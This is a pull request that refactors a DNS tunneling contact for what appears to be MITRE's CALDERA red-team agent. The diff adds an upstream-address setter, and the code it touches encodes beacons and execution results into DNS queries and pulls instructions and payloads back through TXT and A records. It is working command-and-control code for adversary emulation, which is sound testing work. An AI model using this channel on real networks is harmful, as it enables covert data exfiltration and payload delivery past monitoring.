### PR TITLE
DNS tunneling comply with new contact interface

### DIFF
--- a/gocat-extensions/contact/dns_tunneling.go
+++ b/gocat-extensions/contact/dns_tunneling.go
@@ -39,6 +39,7 @@ type DnsTunneling struct {
 	name string
 	resolver *net.Resolver
 	resolverContext context.Context
+	dnsServerAddr string
 }
 
 func init() {
@@ -50,7 +51,6 @@ func init() {
 
 //GetInstructions sends a beacon and returns instructions
 func (d* DnsTunneling) GetBeaconBytes(profile map[string]interface{}) []byte {
-	server := profile["server"].(string)
 	data, err := json.Marshal(profile)
 	if err != nil {
 		output.VerbosePrint(fmt.Sprintf("[-] Cannot request beacon. Error with profile marshal: %s", err.Error()))
@@ -58,14 +58,14 @@ func (d* DnsTunneling) GetBeaconBytes(profile map[string]interface{}) []byte {
 	}
 
 	// Chunk out the beacon message
-	beaconID, err := d.tunnelBytesToServer(server, BEACON_UPLOAD_TYPE, data)
+	beaconID, err := d.tunnelBytes(BEACON_UPLOAD_TYPE, data)
 	if err != nil {
 		output.VerbosePrint(fmt.Sprintf("[-] Error tunneling beacon: %s", err.Error()))
 		return nil
 	}
 
 	// Fetch beacon response
-	beaconResponse, err := d.fetchServerResponseViaTxt(server, beaconID, INSTRUCTION_DOWNLOAD_TYPE)
+	beaconResponse, err := d.fetchResponseViaTxt(beaconID, INSTRUCTION_DOWNLOAD_TYPE)
 	if err != nil {
 		output.VerbosePrint(fmt.Sprintf("[-] Error fetching beacon response: %s", err.Error()))
 		return nil
@@ -78,13 +78,11 @@ func (d* DnsTunneling) GetPayloadBytes(profile map[string]interface{}, payloadNa
 	var payloadBytes []byte
     var filename string
 
-    server := profile["server"].(string)
     platform := profile["platform"]
     paw := profile["paw"]
-    if server != "" && platform != nil && paw != nil {
+    if platform != nil && paw != nil {
     	payloadMetadata := map[string]string{
     		"file": payloadName,
-    		"server": server,
     		"platform": platform.(string),
     		"paw": paw.(string),
     	}
@@ -95,21 +93,21 @@ func (d* DnsTunneling) GetPayloadBytes(profile map[string]interface{}, payloadNa
     	}
 
 		// Let server know we want to download a payload
-		messageID, err := d.tunnelBytesToServer(server, PAYLOAD_REQUEST_TYPE, data)
+		messageID, err := d.tunnelBytes(PAYLOAD_REQUEST_TYPE, data)
 		if err != nil {
 			output.VerbosePrint(fmt.Sprintf("[!] Error requesting payload from server: %s", err.Error()))
 			return nil, ""
 		}
 
 		// Fetch payload filename
-		filename, err = d.fetchPayloadName(server, messageID)
+		filename, err = d.fetchPayloadName(messageID)
 		if err != nil {
 			output.VerbosePrint(fmt.Sprintf("[!] Error fetching payload name from server: %s", err.Error()))
 			return nil, ""
 		}
 
 		// Fetch payload data
-		payloadBytes, err = d.fetchPayloadData(server, messageID)
+		payloadBytes, err = d.fetchPayloadData(messageID)
 		if err != nil {
 			output.VerbosePrint(fmt.Sprintf("[!] Error fetching payload data from server: %s", err.Error()))
 			return nil, ""
@@ -120,26 +118,34 @@ func (d* DnsTunneling) GetPayloadBytes(profile map[string]interface{}, payloadNa
 
 //C2RequirementsMet determines if sandcat can use the selected comm channel
 func (d* DnsTunneling) C2RequirementsMet(profile map[string]interface{}, criteria map[string]string) (bool, map[string]string) {
-    if d.resolver == nil {
-    	server := profile["server"].(string)
-    	if len(server) == 0 {
-    		output.VerbosePrint("[!] No server established for DNS Tunneling.")
-    		return false, nil
-    	}
-		d.resolver = &net.Resolver {
-			PreferGo: true,
-			Dial: func(ctx context.Context, network, address string) (net.Conn, error) {
-				dialer := net.Dialer{
-					Timeout: time.Second * time.Duration(TIMEOUT_SECONDS),
-				}
-				return dialer.DialContext(ctx, network, server)
-			},
-		}
-    }
+	if len(d.dnsServerAddr) == 0 {
+		output.VerbosePrint("[!] No server address established for DNS Tunneling.")
+		return false, nil
+	}
+	if d.resolver == nil {
+		d.setResolver()
+	}
     return true, nil
 }
 
-//SendExecutionResults send results to the server
+func (d* DnsTunneling) SetUpstreamDestAddr(upstreamDestAddr string) {
+	d.dnsServerAddr = upstreamDestAddr
+	d.setResolver()
+}
+
+func (d* DnsTunneling) setResolver() {
+	d.resolver = &net.Resolver {
+		PreferGo: true,
+		Dial: func(ctx context.Context, network, address string) (net.Conn, error) {
+			dialer := net.Dialer{
+				Timeout: time.Second * time.Duration(TIMEOUT_SECONDS),
+			}
+			return dialer.DialContext(ctx, network, d.dnsServerAddr)
+		},
+	}
+}
+
+//SendExecutionResults send results to server
 func (d* DnsTunneling) SendExecutionResults(profile map[string]interface{}, result map[string]interface{}){
 	profileCopy := make(map[string]interface{})
 	for k,v := range profile {
@@ -152,7 +158,7 @@ func (d* DnsTunneling) SendExecutionResults(profile map[string]interface{}, resu
 		output.VerbosePrint(fmt.Sprintf("[-] Cannot send execution results. Error with profile/result marshal: %s", err.Error()))
 		return
 	}
-	if _, err = d.tunnelBytesToServer(profile["server"].(string), BEACON_UPLOAD_TYPE, data); err != nil {
+	if _, err = d.tunnelBytes(BEACON_UPLOAD_TYPE, data); err != nil {
 		output.VerbosePrint(fmt.Sprintf("[-] Failed to send execution results: %s", err.Error()))
 	}
 }
@@ -165,20 +171,20 @@ func (d* DnsTunneling) GetName() string {
 	return d.name
 }
 
-func (d *DnsTunneling) fetchPayloadName(server, messageID string) (string, error) {
-	payloadNameBytes, err := d.fetchServerResponseViaTxt(server, messageID, PAYLOAD_FILENAME_DOWNLOAD_TYPE)
+func (d *DnsTunneling) fetchPayloadName( messageID string) (string, error) {
+	payloadNameBytes, err := d.fetchResponseViaTxt(messageID, PAYLOAD_FILENAME_DOWNLOAD_TYPE)
 	if err != nil {
 		return "", nil
 	}
 	return string(payloadNameBytes), nil
 }
 
-func (d *DnsTunneling) fetchPayloadData(server, messageID string) ([]byte, error) {
-	return d.fetchServerResponseViaTxt(server, messageID, PAYLOAD_DATA_DOWNLOAD_TYPE)
+func (d *DnsTunneling) fetchPayloadData(messageID string) ([]byte, error) {
+	return d.fetchResponseViaTxt(messageID, PAYLOAD_DATA_DOWNLOAD_TYPE)
 }
 
 // Returns message ID and no error upon success.
-func (d* DnsTunneling) tunnelBytesToServer(server string, dataType string, data []byte) (string, error) {
+func (d* DnsTunneling) tunnelBytes(dataType string, data []byte) (string, error) {
 	messageID := generateRandomMessageID()
 
 	// Chunk out data
@@ -199,7 +205,7 @@ func (d* DnsTunneling) tunnelBytesToServer(server string, dataType string, data 
 		if err != nil {
 			return "", err
 		}
-		if err = d.sendDataChunk(server, qname, finalChunk); err != nil {
+		if err = d.sendDataChunk(qname, finalChunk); err != nil {
 			return "", err
 		}
 		start += MAX_UPLOAD_CHUNK_SIZE
@@ -208,8 +214,8 @@ func (d* DnsTunneling) tunnelBytesToServer(server string, dataType string, data 
 }
 
 // If data chunk is the final chunk and server does not respond with completion, returns error.
-func (d *DnsTunneling) sendDataChunk(server string, qname string, finalChunk bool) error {
-	ipAddr, err := d.fetchARecord(server, qname)
+func (d *DnsTunneling) sendDataChunk(qname string, finalChunk bool) error {
+	ipAddr, err := d.fetchARecord(qname)
 	if err != nil {
 		return err
 	}
@@ -224,7 +230,7 @@ func (d *DnsTunneling) sendDataChunk(server string, qname string, finalChunk boo
 	return nil
 }
 
-func (d *DnsTunneling) fetchServerResponseViaTxt(server, messageID, messageType string) ([]byte, error) {
+func (d *DnsTunneling) fetchResponseViaTxt(messageID, messageType string) ([]byte, error) {
 	completed := false
 	var buffer bytes.Buffer
 	for (!completed) {
@@ -233,7 +239,7 @@ func (d *DnsTunneling) fetchServerResponseViaTxt(server, messageID, messageType 
 		if err != nil {
 			return nil, err
 		}
-		responses, err := d.fetchTxtRecords(server, qname)
+		responses, err := d.fetchTxtRecords(qname)
 		if err != nil {
 			return nil, err
 		}
@@ -266,13 +272,13 @@ func generateQname(messageID string, messageType string, chunkIndex int, numChun
 	return fmt.Sprintf("%s.%s.%d.%d.%s.%s.", messageID, messageType, chunkIndex, numChunks, dataHex, BASE_DOMAIN), nil
 }
 
-func (d* DnsTunneling) fetchTxtRecords(server string, qname string) ([]string, error) {
+func (d* DnsTunneling) fetchTxtRecords(qname string) ([]string, error) {
 	msg := new(dns.Msg)
 	msg.Id = dns.Id()
 	msg.RecursionDesired = true
 	msg.Question = make([]dns.Question, 1)
 	msg.Question[0] = dns.Question{qname, dns.TypeTXT, dns.ClassINET}
-	answer, err := dns.Exchange(msg, server)
+	answer, err := dns.Exchange(msg, d.dnsServerAddr)
 	if err != nil {
 		return nil, err
 	}
@@ -283,13 +289,13 @@ func (d* DnsTunneling) fetchTxtRecords(server string, qname string) ([]string, e
 	}
 }
 
-func (d* DnsTunneling) fetchARecord(server, qname string) (net.IP, error) {
+func (d* DnsTunneling) fetchARecord(qname string) (net.IP, error) {
 	msg := new(dns.Msg)
 	msg.Id = dns.Id()
 	msg.RecursionDesired = true
 	msg.Question = make([]dns.Question, 1)
 	msg.Question[0] = dns.Question{qname, dns.TypeA, dns.ClassINET}
-	answer, err := dns.Exchange(msg, server)
+	answer, err := dns.Exchange(msg, d.dnsServerAddr)
 	if err != nil {
 		return net.IPv4(0, 0, 0, 0), err
 	}


### PR DESCRIPTION
## Description
Update DNS tunneling contact to have it conform with new contact interface by implementing the new contact method SetUpstreamDestAddr, as defined in https://github.com/mitre/gocat/pull/49

The DNS tunneling contact will also keep track of the agent's upstream destination address and will update the internal resolver when the agent asks the contact to set a new upstream destination address.

## Type of change
- [x] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?
Tested running the DNS contact with basic operations.

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
